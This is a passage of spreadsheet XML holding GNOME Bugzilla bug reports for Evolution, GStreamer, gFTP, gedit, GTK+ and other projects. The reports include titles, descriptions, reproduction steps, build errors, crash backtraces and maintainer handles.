#1  0x80affba in _ORBIT_skel_GNOME_Evolution_Calendar_Cal_getFreeBusy (
    _ORBIT_servant=0x812758c _ORBIT_recv_buffer=0x8124a98 ev=0xbffff97c 
    _impl_getFreeBusy=0x80b4ca8 )
    at evolution-calendar-skels.c:1025
#2  0x40763ae9 in ORBit_POA_handle_request (recv_buffer=0x8124a98 
    poa=0x8120a30) at orbit_poa.c:507
#3  0x40766c06 in ORBit_handle_incoming_request (recv_buffer=0x8124a98)
    at server.c:90
#4  0x40766f11 in ORBit_handle_incoming_message (recv_buffer=0x8124a98)
    at server.c:160
#5  0x40780c0e in giop_main_handle_connection (connection=0x8125e48)
    at connection.c:1211
#6  0x40722b77 in orb_handle_connection (source=0x8125ee8 cond=G_IO_IN 
    cnx=0x8125e48) at oaf-mainloop.c:69
#7  0x4056f4ba in g_io_unix_dispatch (source_data=0x8125cb0 
    current_time=0xbffffab0 user_data=0x8125e48) at giounix.c:135
#8  0x405709f6 in g_main_dispatch (dispatch_time=0xbffffab0) at gmain.c:656
#9  0x40570fb1 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#10 0x40571129 in g_main_run (loop=0x8125458) at gmain.c:935
#11 0x4048c48a in gtk_main () at gtkmain.c:524
#12 0x406f6082 in bonobo_main () at bonobo-main.c:283
#13 0x805ce45 in main (argc=1 argv=0xbffffb64) at wombat.c:248</t>
  </si>
  <si>
    <t>GSTREAMER-140268</t>
  </si>
  <si>
    <t>gst-plugins</t>
  </si>
  <si>
    <t>ximagesink and xvimagesink do not build under FreeBSD</t>
  </si>
  <si>
    <t>The ximagesink and xvimagesink plugins do not build under FreeBSD.  They include
the sys/ipc.h and sys/shm.h header files but these need sys/types.h to be
included as a prerequisite to work and this must be done manually.
Building a simple test case program that only includes those two files shows it:
In file included from test.c:1:
/usr/include/sys/ipc.h:54: syntax error before `ushort'
In file included from test.c:1:
/usr/include/sys/ipc.h:95: syntax error before `ftok'
/usr/include/sys/ipc.h:95: warning: data definition has no type or storage class
In file included from test.c:2:
/usr/include/sys/shm.h:57: syntax error before `pid_t'
/usr/include/sys/shm.h:60: syntax error before `time_t'
/usr/include/sys/shm.h:93: syntax error before `int'
The fix is trivial and comes from FreeBSD ports.  Just include sys/types.h
before those two other includes.</t>
  </si>
  <si>
    <t>EVOLUTION-207427</t>
  </si>
  <si>
    <t>Shell</t>
  </si>
  <si>
    <t>Pop-up show details of image-fetching task doesn't work</t>
  </si>
  <si>
    <t>If there is a task that goes on forever e.g. loading mail images from
behind a firewall without an HTTP proxy server configured you can click on
the task and get a pop-up with Show details option. That does nothing.
To reproduce:
1. Get behind firewall turn off proxy settings in Nautilus
2. Go to a mail with images (make sure Load images turned on)
3. Little progress bar appears in bottom-left: click it
4. Go to Show details</t>
  </si>
  <si>
    <t>ettore</t>
  </si>
  <si>
    <t>adrian</t>
  </si>
  <si>
    <t>EVOLUTION-261365</t>
  </si>
  <si>
    <t>Supported search bases dialog behind Add Contacts group</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
In the Mail component I selected Add contact group from the drop list of
the New toolbar botton. In the Add Contacts group dialog I changed the
type to LDAP and entered the server name. In the details tab I clicked on
Find Possible search bases button. The Supported search bases dialog
behind Add Contacts group dialog window.
Expected Results:
Add Contacts group dialog window come up on top of the Add Contacts
group dialog 
Additional Information:
Machine configuration
----------------------------------------------------------------------
Red Hat Linux release 9 (Shrike) i386 2.4.20-31.9
GConf2-2.2.1-0.ximian.6.1
ORBit2-2.9.8-0.ximian.6.1
XFree86-libs-4.3.0-2.90.55
atk-1.2.4-0.ximian.6.4
e2fsprogs-1.32-6
evolution-1.4.6-0.ximian.6.6
evolution-1.4.6-0.ximian.6.6
evolution1.5-1.5.90.0.200407080631-0.snap.ximian.6.1
glib2-2.2.3-0.ximian.6.2
glibc-2.3.2-27.9.7
gnome-vfs2-2.2.5-0.ximian.6.14
gtk2-2.2.4-0.ximian.6.2
gtkhtml3.0-3.0.10-0.ximian.6.1
krb5-libs-1.2.7-14
libart_lgpl-2.3.13-0.ximian.6.1
libbonobo-2.4.2-0.ximian.6.2
libbonoboui-2.4.4-0.ximian.6.1
libgal2.0_6-1.99.11-0.ximian.6.1
libglade2-2.0.1-3.ximian.6.8
libgnome-2.2.3-0.ximian.6.4
libgnomecanvas-2.2.1-0.ximian.6.3
libgnomeprint22-2.3.0.cvs.9-0.ximian.6.3
libgnomeprintui22-2.3.0-0.ximian.6.15
libgnomeui-2.2.2-0.ximian.6.3
libgtkhtml3.0_4-3.0.10-0.ximian.6.1
libsoup-1.99.28-0.ximian.6.2
libxml2-2.5.11-0.ximian.6.1
linc-1.0.3-0.ximian.6.1
mozilla-nspr-1.4.2-0.9.0.ximian.6.1
mozilla-nspr-devel-1.4.2-0.9.0.ximian.6.1
mozilla-nss-1.4.2-0.9.0.ximian.6.1
mozilla-nss-devel-1.4.2-0.9.0.ximian.6.1
openldap-2.0.27-8
pango-1.2.5-0.ximian.6.1
perl-5.8.0-88.3
perl-5.8.0-88.3
popt-1.8-0.69
scrollkeeper-0.3.12-3.ximian.6.4
yelp-2.2.3-3.ximian.6.2
zlib-1.1.4-8</t>
  </si>
  <si>
    <t>GFTP-356349</t>
  </si>
  <si>
    <t>GFTP</t>
  </si>
  <si>
    <t>starting a non existing editor will delete the selected file</t>
  </si>
  <si>
    <t>Please describe the problem:
A file is deleted without any warning if you try to edit it
with a program that is not found
Steps to reproduce:
1. 
FTP
Options
General
Edit program:
now type a programm name with a typoo: ie Kate instead of kate
Apply
OK
2. 
Select a local file test.txt
right click the mouse
click edit
3. 
Actual results:
In the progress window I saw:
 Running program: Kate test.txt
 Error: Child 9024 returned 1
 Successfully removed test.txt
The file test.txt is now deleted and cannot be found in the trash bin
Expected results:
I would expect an error message:
application Kate not found 
after step 1
or at least after step 2
Does this happen every time?
Yes
Other information:
Kubuntu 6.06 LTS Dapper Drake</t>
  </si>
  <si>
    <t>masneyb</t>
  </si>
  <si>
    <t>fransvanderpol</t>
  </si>
  <si>
    <t>CHEESE-527870</t>
  </si>
  <si>
    <t>CHEESE</t>
  </si>
  <si>
    <t>Effects button</t>
  </si>
  <si>
    <t>A small change that can improve the UI a lot: don't change the effect button's label to Back when the effects are shown. Instead draw the button in pressed style.
This way it's clearer that the button toggles the effects pane there's less interface morphing (EffectsBack) and also the button does not move around.</t>
  </si>
  <si>
    <t>cheese-maint</t>
  </si>
  <si>
    <t>EVOLUTION-DATA-SERVER-438975</t>
  </si>
  <si>
    <t>EVOLUTION-DATA-SERVER</t>
  </si>
  <si>
    <t>Cleanup pkgconfig call</t>
  </si>
  <si>
    <t>Attaching a small patch to clean up configure.ac pkg-config provides a macro to check for the existence of a package without bothering with flags.</t>
  </si>
  <si>
    <t>evolution-shell-maintainers</t>
  </si>
  <si>
    <t>LIBGNOME-309782</t>
  </si>
  <si>
    <t>LIBGNOME</t>
  </si>
  <si>
    <t>gnome-score broken with 2.11</t>
  </si>
  <si>
    <t>The scrore writting is broken with 2.11.1 this is due to a small error with the
patch for windows patch coming</t>
  </si>
  <si>
    <t>libgnome-maint</t>
  </si>
  <si>
    <t>GTK+-134471</t>
  </si>
  <si>
    <t>Widget: GtkComboBox</t>
  </si>
  <si>
    <t>GtkComboBox in Windows mode misses a grab</t>
  </si>
  <si>
    <t>thats why it leaves the popped up listview behind when moving the window
around or iconifing it or switching workspaces.</t>
  </si>
  <si>
    <t>BUGZILLA.GNOME.ORG-300087</t>
  </si>
  <si>
    <t>duping a bug to a RESOLVED/CLOSED bug should not add reporter as a CC</t>
  </si>
  <si>
    <t>If you dup a bug (bug A) to a bug (bug B) which is already RESOLVED/CLOSED
it should not add the filer of bug A to the CC list of the bug B because
there are not likely to be any future changes to bug B that the filer of bug A
would care about.
In particular when duping a bug to an already-RESOLVED mostfreq bug such
as bug 243160 the only thing that adding a user to the CC list would be to
cause them to get spammed with lots of future bug X has been marked a dup of
this bug messages.</t>
  </si>
  <si>
    <t>GNOME-SPEECH-398916</t>
  </si>
  <si>
    <t>drivers</t>
  </si>
  <si>
    <t>GNOME-SPEECH</t>
  </si>
  <si>
    <t>IBM TTS driver in Chinese language</t>
  </si>
  <si>
    <t>This driver have to be updated for Chinese voices offered by IBM TTS.
Some of the voice names are not coded in unibyte charset and give a stack overflow (a patch will follow soon).
Check please if the driver must be compiled with additional IBM TTS libraries (for example chtrom for Chinese Traditional) and how these libraries can be added to the Makefile.
Note: I will be glad to work on this RFE support from a Chinese person is welcomed!</t>
  </si>
  <si>
    <t>gnome-speech-maint</t>
  </si>
  <si>
    <t>gcasse</t>
  </si>
  <si>
    <t>BOUNTIES-169345</t>
  </si>
  <si>
    <t>BOUNTIES</t>
  </si>
  <si>
    <t>Use a mmap'able cache for fontconfig</t>
  </si>
  <si>
    <t>On the startup of every program fontconfig allocates about 100 kb of data.
This data should be read from a memory mappable cache on disk. This way
the data is shared between processes. Also it allows more expensive
techniques to optimize the data storage.
A solution to this bounty will:
	- Create a program that generates an on-disk cache.
	- Modify fontconfig to read from this file allowing
	  a fallback path with the existing code.
This bug is part of the Integrated Collaborative Desktop Bounty Hunt.  For
more information on prizes contest rules and other bounty tasks visit:
http://www.gnome.org/bounties/
If you would like to start working on this bounty please create a bugzilla
account and append your intention to work on this bounty to this bug.  If
multiple people declare their intentions to work on a task we encourage
you to join forces and work together.
Please do not close this bug.  The contest organizers will mark this bug as
FIXED when the prize is claimed.</t>
  </si>
  <si>
    <t>bounty-bugs</t>
  </si>
  <si>
    <t>bmaurer</t>
  </si>
  <si>
    <t>GSTREAMER-525833</t>
  </si>
  <si>
    <t>[halaudiosrc] unable to get mic USB working with gnome-sound-properties</t>
  </si>
  <si>
    <t>I have to choose ALSA and USB Audio in order to get my USB microphone to work. With gstreamer-properties the audiosrc is correctly set to 
alsasrc device=hw:10
which works great. In gnome-sound-properties however I end up with this: 
halaudiosrc udi=/org/freedesktop/Hal/devices/usb_device_6f8_3005_noserial_if2_sound_card_0_alsa_capture_0
...when chosing USB Audio.
Also I get this output:
sound-properties-Message: Error running pipeline 'gconfaudiosrc ! audioconvert ! audioresample ! gconfaudiosink profile=chat': Could not open audio device for recording. [gstalsasrc.c(640): gst_alsasrc_open (): /pipeline0/gconfaudiosrc0/bin1/halaudiosrc0/bin2/alsasrc0:
Recording open error on device 'default:1': Invalid argument]
The default:1 should probably be hw:10.</t>
  </si>
  <si>
    <t>LIBGSF-339951</t>
  </si>
  <si>
    <t>LIBGSF</t>
  </si>
  <si>
    <t>Small compilation issues for Win32</t>
  </si>
  <si>
    <t>Please describe the problem:
Let me first congratulate you for this brilliant clean &amp; cool library! I wonder
why I didn't start using it before &amp; why this is not part of glib (except for
the libxml2 dependency)...
Thank you so much!
I had two minor problems when compiling for Win32 (cross-compilation from Linux
to mingw32). Both are in gsf-timestamp.c:
1. gmt_to_local_win32() needs windows.h to be included
2. gsf_timestamp_as_string() uses gmtime_r() I had to replace it with gmtime()
Cheers.
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>bogdanni</t>
  </si>
  <si>
    <t>GTHUMB-369449</t>
  </si>
  <si>
    <t>GTHUMB</t>
  </si>
  <si>
    <t>duplicated code: help_cb</t>
  </si>
  <si>
    <t>Pointless code duplication:
src/dlg-categories.c:help_cb
src/dlg-change-date.c:help_cb
src/dlg-comment.c:help_cb
src/dlg-convert.c:help_cb
src/dlg-jpegtran.c:help_cb
src/dlg-photo-importer.c:help_cb
src/dlg-preferences.c:help_cb
src/dlg-redeye-removal.c:help_cb
src/dlg-rename-series.c:help_cb
src/dlg-reset-exif.c:help_cb
src/dlg-search.c:help_cb
src/dlg-web-exporter.c:help_cb
I plan to move help_cb to a library and add a parameter for the manual section.
- Mike</t>
  </si>
  <si>
    <t>paolo.bacchilega</t>
  </si>
  <si>
    <t>BUGZILLA.GNOME.ORG-51618</t>
  </si>
  <si>
    <t>submit@bugs.gnome.org takes Sender: address</t>
  </si>
  <si>
    <t>when creating bug reports with Bug Buddy it sends collected information
through email. However I do not get any confirmation or info by email and
query on my reported bugs fails... That's because bugzilla takes address
Sender: but not From: which are menesis@03bar.ktu.lt and menesis@delfi.lt
accordingly. It is very annoying because I cannot close or change bugs --
until I create *another* bugzilla account</t>
  </si>
  <si>
    <t>menesis</t>
  </si>
  <si>
    <t>GEDIT-351651</t>
  </si>
  <si>
    <t>GEDIT</t>
  </si>
  <si>
    <t>Crash creating the Python module</t>
  </si>
  <si>
    <t>What were you doing when the application crashed?
The crash happened at startup of the application
Distribution: Ubuntu 6.10 (edgy)
Gnome Release: 2.15.91 2006-08-08 (Ubuntu)
BugBuddy Version: 2.15.90
Memory status: size: 34836480 vsize: 0 resident: 34836480 share: 0 rss: 15089664 rss_rlim: 0
CPU usage: start_time: 1155750127 rtime: 0 utime: 49 stime: 0 cutime:40 cstime: 0 timeout: 9 it_real_value: 0 frequency: 0
Backtrace was generated from '/usr/bin/gedit'
(no debugging symbols found)
Using host libthread_db library /lib/tls/i686/cmov/libthread_db.so.1.
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread -1226032960 (LWP 7058)]
0xffffe410 in __kernel_vsyscall ()
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb7639333 in __waitpid_nocancel () from /lib/tls/i686/cmov/libpthread.so.0
#2  0xb7e44558 in gnome_gtk_module_info_get () from /usr/lib/libgnomeui-2.so.0
#3  
#4  0x08094db3 in gedit_python_module_new_object ()
#5  0xb766b2ff in IA__g_type_class_ref (type=136826480) at gtype.c:1872
#6  0xb7652f34 in IA__g_object_new_valist (object_type=136826480 
    first_property_name=0x80c464a module 
    var_args=0xbf8e42d8 \230-\023\byF\f\b\bÃ•'\b) at gobject.c:957
#7  0xb76532aa in IA__g_object_new (object_type=136826480 
    first_property_name=0x80c464a module) at gobject.c:793
#8  0x08094897 in gedit_python_module_new ()
#9  0x080750e0 in gedit_plugins_engine_plugin_is_configurable ()
#10 0x080752ad in gedit_plugins_engine_update_plugins_ui ()
#11 0x0808f1d8 in _gedit_window_move_tab_to_new_window ()
#12 0xb766bf02 in IA__g_type_create_instance (type=135486984) at gtype.c:1567
#13 0xb7654160 in g_object_constructor (type=135486984 
    n_construct_properties=2 construct_params=0x81412a0) at gobject.c:1015
#14 0xb7652625 in IA__g_object_newv (object_type=135486984 n_parameters=0 
    parameters=0x0) at gobject.c:912
#15 0xb765310b in IA__g_object_new_valist (object_type=135486984 
    first_property_name=0x0 var_args=) at gobject.c:955
#16 0xb76532aa in IA__g_object_new (object_type=135486984 
    first_property_name=0x0) at gobject.c:793
#17 0x0806688a in bacon_message_connection_new ()
#18 0x08066a14 in gedit_app_create_window ()
#19 0x08065483 in main ()
Thread 1 (Thread -1226032960 (LWP 7058)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb7639333 in __waitpid_nocancel () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb7e44558 in gnome_gtk_module_info_get () from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#3  
No symbol table info available.
#4  0x08094db3 in gedit_python_module_new_object ()
No symbol table info available.
#5  0xb766b2ff in IA__g_type_class_ref (type=136826480) at gtype.c:1872
	ptype = 
	pclass = (GTypeClass *) 0x811f140
	node = 
	_action =  invalidly modified type 
#6  0xb7652f34 in IA__g_object_new_valist (object_type=136826480 
    first_property_name=0x80c464a module 
    var_args=0xbf8e42d8 \230-\023\byF\f\b\bÃ•'\b) at gobject.c:957
	params = 
	name = 
	object = 
	n_params = 
	n_alloced_params = 
	__PRETTY_FUNCTION__ = IA__g_object_new_valist
#7  0xb76532aa in IA__g_object_new (object_type=136826480 
    first_property_name=0x80c464a module) at gobject.c:793
	var_args = 0xbf8e42d8 \230-\023\byF\f\b\bÃ•'\b
	__PRETTY_FUNCTION__ = IA__g_object_new
#8  0x08094897 in gedit_python_module_new ()
No symbol table info available.
#9  0x080750e0 in gedit_plugins_engine_plugin_is_configurable ()
No symbol table info available.
#10 0x080752ad in gedit_plugins_engine_update_plugins_ui ()
No symbol table info available.
#11 0x0808f1d8 in _gedit_window_move_tab_to_new_window ()
No symbol table info available.
#12 0xb766bf02 in IA__g_type_create_instance (type=135486984) at gtype.c:1567
	node = (TypeNode *) 0x8135e08
	instance = (GTypeInstance *) 0x8143018
	class = (GTypeClass *) 0x8139360
	i = 
	total_size = 
#13 0xb7654160 in g_object_constructor (type=135486984 
    n_construct_properties=2 construct_params=0x81412a0) at gobject.c:1015
	object = (GObject *) 0xb759c560
#14 0xb7652625 in IA__g_object_newv (object_type=135486984 n_parameters=0 
    parameters=0x0) at gobject.c:912
	pspec = (GParamSpec *) 0x80fd990
	nqueue = 
	object = 
	class = (GObjectClass *) 0x8139360
	unref_class = (GObjectClass *) 0x8139360
	slist = 
	n_total_cparams = 2
	n_cparams = 0
	n_oparams = 0
	n_cvalues = 2
	clist = (GList *) 0x0
	i = 3213772424
	__PRETTY_FUNCTION__ = IA__g_object_newv
#15 0xb765310b in IA__g_object_new_valist (object_type=135486984 
    first_property_name=0x0 var_args=) at gobject.c:955
	_value = 
	_value_type = 
	_vtable = 
	_collect_format = 
	_cvalues = {{v_int = -1218000781 v_long = -1218000781 
    v_int64 = 581911378116659315 v_double = 9.1636917209224569e-270 
    v_pointer = 0xb766c873} {v_int = 135014814 v_long = 135014814 
    v_int64 = -4643695739534562914 v_double = -0.014784485335913197 
    v_pointer = 0x80c299e} {v_int = 0 v_long = 0 
    v_int64 = -5205989851584790528 v_double = -3.8131573291821192e-40 
    v_pointer = 0x0} {v_int = 0 v_long = 0 v_int64 = -4643695585050755072 
    v_double = -0.014784753322601318 v_pointer = 0x0} {v_int = -1212146885 
    v_long = -1212146885 v_int64 = 580755860121197371 
    v_double = 7.3962738713503985e-270 v_pointer = 0xb7c01b3b} {
    v_int = -1211235876 v_long = -1211235876 v_int64 = 3083731420 
    v_double = 1.5235657556232443e-314 v_pointer = 0xb7ce01dc} {v_int = 0 
    v_long = 0 v_int64 = 578912388355457024 
    v_double = 5.8466346614409962e-270 v_pointer = 0x0} {v_int = 0 
    v_long = 0 v_int64 = 0 v_double = 0 v_pointer = 0x0}}
	_n_values = 
	error = 
	pspec = 
	params = 
	name = 
	object = 
	n_params = 
	n_alloced_params = 
	__PRETTY_FUNCTION__ = IA__g_object_new_valist
#16 0xb76532aa in IA__g_object_new (object_type=135486984 
    first_property_name=0x0) at gobject.c:793
	var_args = 0xbf8e47b8 Ãµ
	__PRETTY_FUNCTION__ = IA__g_object_new
#17 0x0806688a in bacon_message_connection_new ()
No symbol table info available.
#18 0x08066a14 in gedit_app_create_window ()
No symbol table info available.
#19 0x08065483 in main ()
No symbol table info available.
#0  0xffffe410 in __kernel_vsyscall ()</t>
  </si>
  <si>
    <t>gedit-maint</t>
  </si>
  <si>
    <t>Karel.Demeyer</t>
  </si>
  <si>
    <t>EVOLUTION-333234</t>
  </si>
  <si>
    <t>Critical warning assertion `GCONF_IS_CLIENT (client)' failed and crash when starting evolution in a new user mode</t>
  </si>
  <si>
    <t>Steps to reproduce:
1.Create a new user new_user. 
2.Logout desktop and login it with new_user
3.start evoluiton
evolution crash.
Stack trace:
  [1] __lwp_kill(0x1 0x5) at 0xcfba8fa5
  [2] _thr_kill(0x1 0x5) at 0xcfba5b64
  [3] raise(0x5) at 0xcfb6dd14
  [4] g_logv(0xd174d640 0x8 0xd174d618 0x8044abc) at 0xd0cb11b5
  [5] g_log(0xd174d640 0x8 0xd174d618 0xd174d5e4 0x538 0xd174cf68) at
0xd0cb127d
  [6] gconf_client_get(0x0 0xcd0f18b8 0x0) at 0xd1742e87
  [7] gconf_client_get_string(0x0 0xcd0f18b8 0x0) at 0xd174344f
=&gt;[8] calendar_config_get_primary_tasks() line 721 in calendar-config.c
  [9] ensure_sources(component = 0x818ca60) line 201 in tasks-component.c
  [10] tasks_component_init(component = 0x818ca60 klass = 0x81707f8) line 1306
in tasks-component.c
  [11] g_type_create_instance(0x8170758) at 0xd0d74858
  [12] g_object_constructor(0x8170758 0x1 0x8139828) at 0xd0d5e3a7
  [13] bonobo_object_constructor(0x8170758 0x1 0x8139828) at 0xd1793e62
  [14] g_object_newv(0x8170758 0x0 0x0) at 0xd0d5d93b
  [15] g_object_new_valist(0x8170758 0x0 0x8044ee0) at 0xd0d5e346
  [16] g_object_new(0x8170758 0x0) at 0xd0d5d506
  [17] tasks_component_peek() line 1317 in tasks-component.c
  [18] factory(factory = 0x818ca30 component_id = 0x8256e11
OAFIID:GNOME_Evolution_Tasks_Component:2.6 closure = (ni l)) line 179 in
main.c
  [19] bonobo_marshal_OBJECT__STRING(0x825c860 0x80450bc 0x2 0x82b0c68 0x0
0x0) at 0xd17a0051
  [20] g_closure_invoke(0x825c860 0x80450bc 0x2 0x82b0c68 0x0) at 0xd0d5a8a6
  [21] bonobo_closure_invoke_va_list(0x825c860 0x80450bc 0x80451a4) at 0xd17a10a1
  [22] bonobo_closure_invoke(0x825c860 0x80b5728 0x80451c0 0x8256d18
0x818ca30 0x41 0x8256e11 0x0) at 0xd17a135d 
  [23] bonobo_generic_factory_new_generic(0x818ca30 0x8256e11) at 0xd178d62a
  [24] bonobo_shlib_factory_new_generic(0x818ca30 0x8256e11) at 0xd179a579
  [25] impl_Bonobo_ObjectFactory_createObject(0x818ca44 0x8256e11 0x80454e8)
at 0xd178d1ea
  [26] _ORBIT_skel_small_Bonobo_GenericFactory_createObject(0x818ca44
0x80452cc 0x80452c8 0x0 0x80454e8 0xd178d0f0)  at 0xd16f6eee
  [27] ORBit_c_stub_invoke(0x82b0c00 0xd171036c 0x0 0x80452cc 0x80452c8
0x0 0x80454e8 0x9 0x4 0xd16f6ed4) at 0 xd1691d45
  [28] Bonobo_GenericFactory_createObject(0x82b0c00 0x8256e11 0x80454e8) at
0xd16f8889
  [29] bonobo_activation_activate_shlib_server(0x8260f44 0x80454e8) at 0xd16f9b44
  [30] handle_activation_result(0x8260f44 0x0 0x80454e8) at 0xd16fa41e
  [31] bonobo_activation_activate(0x80453f0 0x0 0x0 0x0 0x80454e8) at
0xd16fa567
  [32] bonobo_activation_activate_from_id(0x825b4e9 0x0 0x0 0x80454e8) at
0xd16fa729
  [33] query_components(registry = 0x827df00) line 192 in e-component-registry.c
  [34] e_component_registry_peek_list(registry = 0x827df00) line 295 in
e-component-registry.c
  [35] e_shell_construct(shell = 0x818c950 iid = 0x8079998
OAFIID:GNOME_Evolution_Shell:2.6 startup_line_mode = E_SH
ELL_STARTUP_LINE_MODE_CONFIG) line 687 in e-shell.c
  [36] e_shell_new(startup_line_mode = E_SHELL_STARTUP_LINE_MODE_CONFIG
construct_result_return = 0x80455ac) line 735 in e-shell.c
  [37] idle_cb(data = (nil)) line 347 in main.c
  [38] warning_dialog_response_callback(dialog = 0x8186808 button_number = -5
data = 0x8190820) line 199 in main.c
  [39] g_cclosure_marshal_VOID__INT(0x823f9b0 0x0 0x2 0x804578c 0x80456ec
0x0) at 0xd0d70593
  [40] g_closure_invoke(0x823f9b0 0x0 0x2 0x804578c 0x80456ec) at 0xd0d5a8a6
  [41] signal_emit_unlocked_R(0x811a8d0 0x0 0x8186808 0x0 0x804578c) at
0xd0d6fb5c
  [42] g_signal_emit_valist(0x8186808 0x66 0x0 0x80459f8) at 0xd0d6ede5
  [43] g_signal_emit(0x8186808 0x66 0x0 0xfffffffb) at 0xd0d6ef81
  [44] gtk_dialog_response(0x8186808 0xfffffffb) at 0xd12b4324
  [45] action_widget_activated(0x80b4970 0x8186808) at 0xd12b3cb6
  [46] g_cclosure_marshal_VOID__VOID(0x816c0e8 0x0 0x1 0x8045bac 0x8045b0c
0x0) at 0xd0d702dd
  [47] g_closure_invoke(0x816c0e8 0x0 0x1 0x8045bac 0x8045b0c) at 0xd0d5a8a6
  [48] signal_emit_unlocked_R(0x818ae98 0x0 0x80b4970 0x0 0x8045bac) at
0xd0d6fb5c
  [49] g_signal_emit_valist(0x80b4970 0x6c 0x0 0x8045e18) at 0xd0d6ede5
  [50] g_signal_emit(0x80b4970 0x6c 0x0) at 0xd0d6ef81
  [51] gtk_button_clicked(0x80b4970) at 0xd1271c95
  [52] gtk_real_button_released(0x80b4970 0x810e940) at 0xd1272a20
  [53] g_cclosure_marshal_VOID__VOID(0x816e4f0 0x0 0x1 0x804600c 0x8045f6c
0xd12729e8) at 0xd0d702dd
  [54] g_type_class_meta_marshal(0x816e4f0 0x0 0x1 0x804600c 0x8045f6c
0x1a4) at 0xd0d5aba1
  [55] g_closure_invoke(0x816e4f0 0x0 0x1 0x804600c 0x8045f6c) at 0xd0d5a8a6
  [56] signal_emit_unlocked_R(0x8093838 0x0 0x80b4970 0x0 0x804600c) at
0xd0d6f829
  [57] g_signal_emit_valist(0x80b4970 0x6b 0x0 0x8046278) at 0xd0d6ede5
  [58] g_signal_emit(0x80b4970 0x6b 0x0) at 0xd0d6ef81
  [59] gtk_button_released(0x80b4970) at 0xd1271c25
  [60] gtk_button_button_release(0x80b4970 0x80b2110 0x810ddc8) at 0xd1272888
  [61] _gtk_marshal_BOOLEAN__BOXED(0x8139f88 0x80463b0 0x2 0x804646c
0x80463cc 0xd1272864) at 0xd1323f51
  [62] g_type_class_meta_marshal(0x8139f88 0x80463b0 0x2 0x804646c
0x80463cc 0xb4) at 0xd0d5aba1
  [63] g_closure_invoke(0x8139f88 0x80463b0 0x2 0x804646c 0x80463cc) at
0xd0d5a8a6
  [64] signal_emit_unlocked_R(0x816a360 0x0 0x80b4970 0x80465ec 0x804646c)
at 0xd0d6fd21
  [65] g_signal_emit_valist(0x80b4970 0x33 0x0 0x80466e0) at 0xd0d6eb7b
  [66] g_signal_emit(0x80b4970 0x33 0x0 0x80b2110 0x8046704) at 0xd0d6ef81
  [67] gtk_widget_event_internal(0x80b4970 0x80b2110) at 0xd1405aaa
  [68] gtk_widget_event(0x80b4970 0x80b2110) at 0xd1405739
  [69] gtk_propagate_event(0x80b4970 0x80b2110) at 0xd1322ac6
  [70] gtk_main_do_event(0x80b2110 0x0) at 0xd1321b38
  [71] gdk_event_dispatch(0x80b4570 0x0 0x0) at 0xd0f8e1f6
  [72] g_main_dispatch(0x80b45b8) at 0xd0ca9664
  [73] g_main_context_dispatch(0x80b45b8) at 0xd0caa74d
  [74] g_main_context_iterate(0x80b45b8 0x1 0x1 0x80986f0) at 0xd0caab6d
  [75] g_main_loop_run(0x826ef88) at 0xd0cab172
  [76] bonobo_main(0x8046b8c 0x8046a20 0xd27fb840 0xcfbf3580 0xcf8a2000
0x81641c0) at 0xd178f40e
  [77] main(argc = 1 argv = 0x8046a64) line 610 in main.c
Other information:
If you have ever configured evolution it will not crash.</t>
  </si>
  <si>
    <t>evolution-calendar-maintainers</t>
  </si>
  <si>
    <t>jeff.cai</t>
  </si>
  <si>
    <t>BRASERO-671442</t>
  </si>
  <si>
    <t>BRASERO</t>
  </si>
  <si>
    <t>Add Desktop Actions for Unity</t>
  </si>
  <si>
    <t>This adds Unity quicklist support now that desktop actions are part of
the .desktop spec
http://standards.freedesktop.org/desktop-entry-spec/desktop-entry-spec-latest.html#extra-actions</t>
  </si>
  <si>
    <t>bonfire-maint</t>
  </si>
  <si>
    <t>GOSSIP-126981</t>
  </si>
  <si>
    <t>GOSSIP</t>
  </si>
  <si>
    <t>Make Show Log insensitive when there is no log</t>
  </si>
  <si>
    <t>Useful both when log doesn't exist yet and for contacts not on the list
where log will never exist.</t>
  </si>
  <si>
    <t>gossip-maint</t>
  </si>
  <si>
    <t>hallski</t>
  </si>
  <si>
    <t>GNOME-TODO-757170</t>
  </si>
  <si>
    <t>GNOME-TODO</t>
  </si>
  <si>
    <t>Modifies task twice</t>
  </si>
  <si>
    <t>While I was investigating the cause of the crash from bug #757169 I noticed that gnome-todo calls e_cal_client_modify() twice when saving the changes. At least the backtrace and my debugging shows that. The gnome-todo should call the modify only once not twice for one change.
Steps:
a) edit an existing task in a Google calendar
b) change Due date and Priority
c) click the x button of the task details to save the changes
The associated evolution-calendar-factory-subprocess shows that the modify is called twice at the same time.</t>
  </si>
  <si>
    <t>gnome-todo-maint</t>
  </si>
  <si>
    <t>GNOME-ROBOTS-768786</t>
  </si>
  <si>
    <t>GNOME-ROBOTS</t>
  </si>
  <si>
    <t>Fix the build when srcdir != builddir</t>
  </si>
  <si>
    <t>gnome-robots doesn't build when srcdir != builddir:
gmake[2]: Entering directory '$builddir/gnome-robots/src'
Failed to open file 'robots.gresource.xml': No such file or directory
  GEN      robots-resources.c
Failed to open file 'robots.gresource.xml': No such file or directory
gmake[2]: *** [Makefile:865: robots-resources.c] Error 1
Please see the attached patch that fixes the problem.</t>
  </si>
  <si>
    <t>gnome-robots-maint</t>
  </si>
  <si>
    <t>GIMP-97771</t>
  </si>
  <si>
    <t>Imagemap segfaults after drawing anything</t>
  </si>
  <si>
    <t>Imagemap segfaults immediately after drawing the very first object. It also
segfaults after loading a image map file in the same situation.
This is due to wrong assumption the undo list is always nonempty.</t>
  </si>
  <si>
    <t>yeti</t>
  </si>
  <si>
    <t>NAUTILUS-40638</t>
  </si>
  <si>
    <t>Trash</t>
  </si>
  <si>
    <t>When a new volume gets mounted integrate its Trash directory</t>
  </si>
  <si>
    <t xml:space="preserve">When a volume gets unmounted remove the respective local Trash from the unified
Trash directory.
------- Additional Comments From sullivan@eazel.com 2000-09-08 15:26:56 ----
Setting all bugs to P6 to start official bug-prioritization plan. Please don't
set the priority to anything other than P6 unless you've got the gold seal of
approval for doing so.
------- Additional Comments From eli@eazel.com 2000-10-16 19:31:26 ----
Batch-assigning QA ownership of remaining bugs to eli@eazel.com
